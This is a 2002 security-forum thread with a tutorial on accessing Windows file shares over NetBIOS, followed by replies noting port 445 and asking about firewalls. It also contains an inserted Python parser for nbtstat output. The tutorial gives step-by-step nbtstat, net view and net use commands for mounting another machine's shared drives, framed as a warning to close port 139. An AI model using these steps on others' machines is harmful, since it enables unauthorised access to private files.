-
May 25th, 2002, 04:16 PM
#1
net bios hacking
NetBIOS Tutorial by RiOtEr
NetBIOS stands for Network Basic Input/Output System and is used in Windows for its file and printer sharing.
1. NetBIOS
To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:
25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn
If your results look like that then you're set...
2. nbtstat
To get the info you need for the attack we use a program called nbtstat:
Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.
Code:
c:\>nbtstat -A 127.0.0.1
Use -A if you're using IP addresses. If you're going to use hostnames use -a.
This will give you what is called a nametable:
Code:
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []
NetBIOS Remote Machine Name Table
Name                   Type     Status
---------------------------------------------
computername     <00>  UNIQUE   Registered
workgroupname    <00>  GROUP    Registered
computername     <20>  UNIQUE   Registered
workgroupname    <1E>  GROUP    Registered
workgroupname    <1D>  UNIQUE   Registered
..__MSBROWSE__.  <01>  GROUP    Registered
MAC Address = xx-xx-xx-xx-xx-xx
This is a friend's nametable (names and workgroups have been edited to save him from elite_hax0rs)
Now, the line
Code:
computername <20> UNIQUE Registered
is the interesting one as <20> means that filesharing is enabled: that means we can try to connect to that computer.
First, we need to know their harddrive names etc, and we need to see if it's xp and if they have SharedDocs. To do this we use net view \\ipaddress
Code:
C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name Type Used as Comment
-----------------------------------
SharedDocs Disk
The command completed successfully.
That's the result you should get (it will be different on a non-WinXP box).
Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
net use letter: \\ipaddress\name
Code:
c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.
Now their harddrive is "mirrored" to the drive letter we specified (so make sure it's not a drive that exists on your computer). Now just browse it as you would a local drive:
In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
When you're done, make sure you remove the shared drive from your machine:
Code:
c:\>net use /delete g:
g: was deleted successfully.
Some systems may be locked with passwords (win2k, WinNT):
If you know the password, you would use this command:
Code:
net use \\ip\sharename password
(not sure about that one...)
Now, many people will be saying "this is a security site, why are you telling us this?". The reason is simple: I'm showing you how easy it is for your windows machine to be hacked without proper protection... Moral of this story: always cover port 139.
RiOtEr
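Added example, not part of the original post: a small Python parser for the name table that nbtstat prints, which you can feed the output of `nbtstat -n` from your own machine to see whether it advertises the file server service (<20>). The function names and the suffix table are this example's own, and the sample input is constructed using the post's placeholder names.

```python
import re

# Well-known NetBIOS name suffixes (16th byte of the name) and what they mean.
SUFFIXES = {
    ("00", "UNIQUE"): "Workstation service (computer name)",
    ("00", "GROUP"): "Workgroup or domain name",
    ("01", "GROUP"): "Master browser (__MSBROWSE__)",
    ("1D", "UNIQUE"): "Master browser for the workgroup",
    ("1E", "GROUP"): "Browser service elections",
    ("20", "UNIQUE"): "File server service (file and printer sharing)",
}

# One table row: name, <suffix>, UNIQUE or GROUP, status.
ROW = re.compile(r"^\s*(?P<name>.+?)\s*<(?P<suffix>[0-9A-Fa-f]{2})>\s+"
                 r"(?P<type>UNIQUE|GROUP)\s+(?P<status>\w+)\s*$")

def parse_name_table(text):
    """Return one dict per name-table row found in nbtstat output."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:  # headers, separators and the MAC line do not match
            row = m.groupdict()
            row["suffix"] = row["suffix"].upper()
            row["meaning"] = SUFFIXES.get((row["suffix"], row["type"]), "unknown")
            rows.append(row)
    return rows

def sharing_advertised(rows):
    """Names that register the file server service (<20> UNIQUE)."""
    return [r["name"] for r in rows
            if (r["suffix"], r["type"]) == ("20", "UNIQUE")
            and r["status"] == "Registered"]

# Constructed sample in the layout shown in the post (placeholder names).
SAMPLE = """\
Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered
MAC Address = xx-xx-xx-xx-xx-xx
"""

if __name__ == "__main__":
    rows = parse_name_table(SAMPLE)
    for r in rows:
        print(f'{r["name"]:<16} <{r["suffix"]}> {r["type"]:<6} {r["meaning"]}')
    if sharing_advertised(rows):
        print("File sharing is advertised: filter ports 139 and 445 or disable sharing.")
```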
-
May 25th, 2002, 10:00 PM
#5
Good post, I learned something!
-
May 25th, 2002, 11:12 PM
#6
<quote>Moral of this story: always cover port 139.</quote>
True, but Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. Port 139 is like "smb over netbios over tcp" (sort of)...
Moral of this follow up: if you run w2k or wXP, always cover port 139 AND 445
Ammo
Credit travels up, blame travels down -- The Boss
-
May 25th, 2002, 11:19 PM
#7
So when you port scan a system and netbios services are open you can just use net to connect and rummage through their directories?
-
May 25th, 2002, 11:23 PM
#8
Sometimes...
Depends if there are actually drives shared, and depends on if passwords are set.
Ammo
Credit travels up, blame travels down -- The Boss
-
May 26th, 2002, 12:59 AM
#9
very good, expect some green, amn best tut ive ever read.
preep
http://www.attrition.org/gallery/computing/forum/tn/youarenot.gif.html
-
May 26th, 2002, 01:23 AM
#10
um... ur all probably gunna tell me i have stupid questions but at least i might be safe if its answered, if u have a firewall doesnt it protect all ports?